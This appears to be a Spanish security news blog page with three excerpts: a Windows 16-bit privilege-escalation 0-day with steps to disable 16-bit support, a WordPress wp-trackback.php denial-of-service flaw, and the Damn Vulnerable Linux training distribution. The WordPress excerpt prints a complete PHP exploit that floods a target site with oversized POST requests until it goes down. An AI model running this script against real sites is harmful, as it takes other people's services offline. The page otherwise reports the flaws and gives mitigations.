Vulnerabilidad 0-day en todas las versiones de Windows

Microsoft no ha empezado el año bien con respecto a la seguridad de sus productos, mientras muchos todavía esperamos los parches oficiales para el 0-Day en el  Internet Explorer que se anuncio hace poco, hoy sale a la luz publica otro 0-Day que afecta a todas las versiones del sistema operativo Microsoft Windows. Este fallo descubierto por el investigador Tavis Ormandy (miembro del equipo de seguridad de google), se aprovecha del soporte heredado de aplicaciones de 16 bits que Windows viene heredando desde su versión “NT” y permite a un atacante obtener privilegios de SYSTEM (máximo privilegio en el sistema) en un sistema vulnerable. Aunque todavía no existe un parche para este fallo de seguridad,  solo tendremos que deshabilitar el soporte para aplicaciones de 16 bits para proteger nuestro sistema, a continuación les dejo una serie de pasos a seguir para desactivarlo: Inicio/Ejecutar gpedit.msc Abrir “Configuración de equipo”/ “Plantillas administrativas”/ “Componentes de Windows”/”Compatibilidad de aplicación” Y habilitar “Impedir el acceso a aplicaciones de 16 bits” O puedes seguir los pasos de los siguientes vídeos según tu sistema operativo Windows Server 2003: Windows Server 2008 Para Windows XP: Ya existe un exploit publicado para este bug que funciona correctamente incluso en Windows 7, puedes encontrar el código fuente en este enlace, o el exploit compilado aquí, por lo tanto es MAS QUE RECOMENDADO que desactives el soporte para 16 bits de tu sistema y actualices el mismo con Windows Update tan pronto salga el parche que corrija este problema. Mas Información: Grave vulnerabilidad en Windows permite elevar privilegios Vulnerabilidad muy crítica en todas las versiones de...

Leer Más

Denegacion de Servicio en WordPress

Jose Carlos Norte acaba de publicar en su blog, un nuevo fallo de seguridad descubierto en el popular wordpress, este fallo permite a a cualquier persona de forma sencilla dejar fuera de linea un blog con WordPress causando una denegacion de servicio. El bug se encuentra en el archivo wp-trackback.php quien no valida adecuadamente la variable $charset, permitiendo ingresar una peticion POST especialmente diseñada con una cantidad indeterminada de parámetros, causando un  gran consumo de memoria y CPU hasta que estos se agoten y el servidor deja de responder. Todas las versiones de WordPress hasta el momento son vulnerables a este fallo (y según Jose Carlos, el parche que publicaría WordPress tampoco lo soluciona), aunque dependiendo de la configuración individual de cada servidor, el problema es mayor o menor, por ejemplo un servido con mod_security, no seria vulnerable ya que  bloquearía estas peticiones mal intencionadas,  también se pueden mitigar los daños con una adecuada configuración del parámetro php_memory_limit del php.ini para evitar que tus desarrollos web utilicen mas memoria de la que en realidad necesitan, podrías también utilizar el WP-IDS un mod para WordPress del PHPIDS (reseñado el la guía blanca de seguridad en wordpress WordPress Security Whitepaper) el cual bloquearía no solo estas peticiones sino muchos mas problemas de seguridad. Les dejo la solución propuesta por Jose Carlos en su blog para este problema: Reemplazar en la linea 45 del archivo wp-trackback.php esto $charset = $_POST['charset']; por esto $charset = str_replace(”,”,””,$_POST[‘charset’]); if(is_array($charset)) { exit; } Y el exploit para verificar que somos vulnerables: <?php //wordpress Resource exhaustion Exploit //http://rooibo.wordpress.com/ [email protected] contacted and get a response, //but no solution available. if(count($argv) < 2) { echo “You need to specify a url to attack\n”; exit; } $url = $argv[1]; $data = parse_url($url); if(count($data) < 2) { echo “The url should have http:// in front of it, and should be complete.\n”; exit; } if(count($data) == 2) { $path = ”; } else { $path = $data[‘path’]; } $path = trim($path,’/’); $path .= ‘/wp-trackback.php’; if($path{0} != ‘/’) { $path = ‘/’.$path; } $b = “”; $b = str_pad($b,140000,’ABCEDFG’); $b = utf8_encode($b); $charset = “”; $charset = str_pad($charset,140000,”UTF-8,”); $str = ‘charset=’.urlencode($charset); $str .= ‘&url=www.example.com’; $str .= ‘&title=’.$b; $str .= ‘&blog_name=lol’; $str .= ‘&excerpt=lol’; $count = 0; while(1) { $fp = @fsockopen($data[‘host’],80); if(!$fp) { if($count > 0) { echo “down!!!!\n”; exit; } echo “unable to connect to: “.$data[‘host’].”\n”; exit; } fputs($fp, “POST $path HTTP/1.1\r\n”); fputs($fp, “Host: “.$data[‘host’].”\r\n”); fputs($fp, “Content-type: application/x-www-form-urlencoded\r\n”); fputs($fp, “Content-length: “.strlen($str).”\r\n”); fputs($fp, “Connection: close\r\n\r\n”); fputs($fp, $str.”\r\n\r\n”); echo “hit!\n”; $count++; } ?> Para mas informacion: Agujero de seguridad muy grave en WordPress Atención! BUG WordPress WordPress Security Whitepaper $charset =...

Leer Más

Damn Vulnerable Linux (DVL) – Distribucion GNU/Linux mas Insegura por Defecto

Ha salido la versión 1.5 de Damn Vulnerable Linux (DVL) una distribución que ya había sido comentada en el portal y esta diseñada para ser lo mas insegura posible, sus creadores han pasado mucho tiempo configurando esta para poder llamarla la distribución GNU/Linux mas insegura por defecto. Tiene un kernel 2.4, con aplicaciones no muy actualizadas y configuraciones que facilitan el ataque a la misma, para proporcionar agujeros de seguridad en todos lados. ¿Para que quiero yo una distribución así?, DVL es una distribución Linux pensada para ayudar en el aprendizaje de la seguridad informatica, tiene servidores servidores perfectamente instalados y listos para utilizar, ensambladores, desensambladores, debuggers y todas las herramientas necesarias para explorar posibles vulnerabilidades en las aplicaciones y el sistema como tal. Vídeo de Presentación para Damn Vulnerable Linux Mas Información: Damn Vulnerable...

Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES